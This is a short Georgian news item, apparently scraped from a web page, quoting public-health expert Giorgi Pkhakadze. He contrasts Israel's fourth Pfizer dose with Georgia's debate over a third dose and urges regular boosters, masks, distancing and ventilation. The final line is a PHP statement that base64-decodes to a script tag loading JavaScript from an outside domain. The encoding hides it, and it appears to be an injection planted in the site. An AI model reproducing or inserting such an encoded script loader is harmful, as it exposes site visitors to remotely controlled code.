celsiusi
ავერსი საქკაბელი
ისრაელი უკვე ფაიზერის მე-4 დოზაზე გადავიდა და საქართველო კიდევ მსჯელობს, დაუშვას თუ არა ფაიზერის მე-3 დოზა 3 თვეში - ამის შესახებ საზოგადოებრივი ჯანდაცვის ექსპერტი, პროფესორი გიორგი ფხაკაძე სოციალურ ქსელში წერს.
 
მისივე თქმით, დრო არ იცდის და მსჯელობის დრო არ არის.
 
"იმსჯელეთ ეს ბოლო 2 წელია და შედეგიც სახეზეა. მივიღოთ პრაგმატული გადაწყვეტილება, მარტივად გააკეთეთ ყველაფერი ისე, როგორც არის ისრაელში და მორჩა. არ დამიწყოთ ახლა, რომ საქართველოში უფრო ძლიერი მეცნიერები და ექსპერტები არიან, ვიდრე ისრაელში. ზაღაპრებს თავი დაანებეთ. გადავიდეთ ფაიზერზე (ჩამოვიტანოთ მოდერნა), ბუსტერი მხოლოდ ფაიზერით ყველასთვის ყოველ 3-4 თვეში, სანამ ახალი მოდიფიცირებული ვაქცინები არ იქნება ხელმისაწვდომი", - წერს გიორგი ფხაკაძე, 
 
✅სამედიცინო პირბადე; 
✅დისტანცია; 
✅გაანიავეთ შენობები; 
✅იყავით პოზიტიურები; 
✅სწორი და მუდმივი კომუნიკაცია მოსახლეობასთან; 
✅ყველა სკეპტიკოსი დაპატიჟეთ და დაელაპარაკეთ (ტვ შოუ ოღონდ არ გვინდა).
1745
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");